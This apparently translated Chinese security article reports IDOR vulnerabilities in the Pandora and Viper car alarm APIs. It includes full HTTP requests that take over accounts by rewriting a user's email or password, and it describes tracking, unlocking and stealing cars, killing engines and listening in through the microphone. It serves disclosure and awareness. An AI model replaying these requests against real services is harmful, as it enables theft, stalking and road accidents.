unhackable汽车报警系统漏洞利用

研究人员发现英国厂商andora和Clifford的汽车报警系统的报警器API存在IDOR漏洞；

攻击者利用该漏洞可以使运行的汽车停车，攻击者还可以利用该漏洞来窃取汽车。

针对无钥匙进入系统（keyless entry）汽车的Key relay攻击已经很常见了，许多第三方汽车报警器厂商都提供针对这类攻击的解决方案。

研究人员分析发现这类报警器的使用可能会使汽车更加不安全。因为报警器可能会被攻击者劫持，使汽车引擎停止运行，还可以用来窃取汽车。

其中一个报警器厂商Pandora的广告中称它们的报警器是非常安全的、不可能被黑的unhackable。因此许多安全研究人员和黑客都对它非常感兴趣。

这两个报警器厂商分别是Viper和Pandora，也是英国最大的两个报警器厂商。结果分析，研究人员发现漏洞存在于API的insecure direct object references (IDORs，不安全的直接对象引用)。通过修改参数，攻击者可以在不经过认证的情况下修改账号注册的邮箱地址、重置修改后的地址的密码、并接管账号。

还可以对汽车进行定位、并追踪特定的汽车，使汽车停止运行和开锁。总的来说，劫持车辆和司机是非常容易的。

Viper漏洞

Viper的智能启动报警器是由第三方CalAmp提供后台服务的。

漏洞位于修改用户（modify user）请求的IDOR中。虽然其他的API都正确地进行了认证，但是/users/Update/xxxxx请求没有进行有效性的认证。因此，攻击者可以发布一个恶意请求来修改用户密码和login以允许与报警器进行交互。合法的用户就会被锁定，也无法访问报警器。

请求示例：

POST /users/Update/861772 HTTP/1.1
Host: colt.calamp-ts.com
Connection: close
Content-Length: 342
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://colt.calamp-ts.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://colt.calamp-ts.com/dashboard/home
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: __utma=36020146.382676338.1549803856.1549803856.1549803856.1; __utmc=36020146; __utmz=36020146.1549803856.1.1.utmcsr=medium.com|utmccn=(referral)|utmcmd=referral|utmcct=/@evstykas/remote-smart-car-hacking-with-just-a-phone-2fe7ca682162; kohanasession=flrd2pb6lcqohnu3ld79p9oif7; __utmt=1; __utmb=36020146.8.10.1549803856
FirstName=f&LastName=l&Email=egw2%40mailinator.com&Phone=123+132-1321&UserName=egw2%40mailinator.com&Password=!Password1&Language=English&Measurement=Imperial&Timezone=Etc%2FGMT%2B8&Pincode=0&Question=What%2Btown%2Bwere%2Byou%2Bborn%2Bin%253F&Answer=no&MsgFlag=0&DaylightSavings=0&CustomAttributes=%5B%5D&SessionId=flrd2pb6lcqohnu3ld79p9oif7

下面是修改密码的截图：

 Pandora漏洞

该漏洞是一个POST请求上的IDOR：email JSON参数lhttps://pro.p-on.ru/api/sputnik/workers?id=xxxx

POST /api/sputnik/workers?id=xxxxx HTTP/1.1
Host: pro.p-on.ru
Connection: close
Content-Length: 167
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://pro.p-on.ru
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/json
Referer: https://pro.p-on.ru/workers/185000
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie:; sid=4020f4ba21edb3082902e227937995d6
{"id":xxxxx,"name_f":"name","name_i":"name_i","name_o":"name_o","groups":[],"email":"newemail","type":"user","company_perms":0}

因此攻击者可以用可以控制和利用密码重置来覆写当前Email。密码重置后，用户可以登陆到app并获取完全控制权限。如果攻击是针对admin用户的，那么带来的后果就会比较验证，因为可以管理员用户可以访问多个车辆。而且存在明显的数据泄露，可以在https://pro.p-on.ru/workers/xxxxx中将xxxxx替换为用户ID号：

攻击者就可以获取所有的用户数据。而且攻击者无需购买设备就可以进行创建账号，因为这两款产品都允许用户创建test/demo账号。有了demo账号，攻击者就可以访问真实的账号并提取相关细节。

下面看一下Range Rover:

可以实时定位：

研究人员发现还可以用该APP来克隆报警器的key fob，然后可以解锁汽车，如下图所示：

攻击者还可以偷汽车。

Kill汽车引擎Viper

研究人员发现还可以关掉移动中的装备了Viper汽车的引擎。该功能的最初目的是发现并停止被窃汽车的引擎。但是利用手机APP的账号接管漏洞，攻击者可以停止装备viper的汽车的引擎。

该功能并不在Viper手机APP的UI中，而是在API中支持。因此恶意攻击者可能会触发许多高度公路上汽车的事故。

被监听

Pandora报警器还可以拨打SOS电话。其中有一个麦克风来完成这个功能。由于API的认证漏洞，麦克风可以被远程访问和启动。因此，所有安装了该报警器的用户和汽车都可以被监听。

CAN控制

Viper和Pandora都有发送CAN消息的能力，这是非常可怕的。近年来，许多汽车报警器都可以与CAN直接交互和通信。由于现代汽车的复杂性，这种直接交互可以减少报警和安装所需的时间。

启动和停止功能已经启动了。

结论

通过以上分析，可以看出利用IOT API的IDOR在许多场景下都是很容易的。这也不是第一次发现此类大规模的潜在攻击。这些报警器都是非常贵的，主要适配高端汽车，尤其是无钥匙进入系统。研究人员粗略估算有大约300万辆、价值1500亿美元的汽车处于危险中。而这些报警器并没有添加额外的安全功能来保护key relay攻击。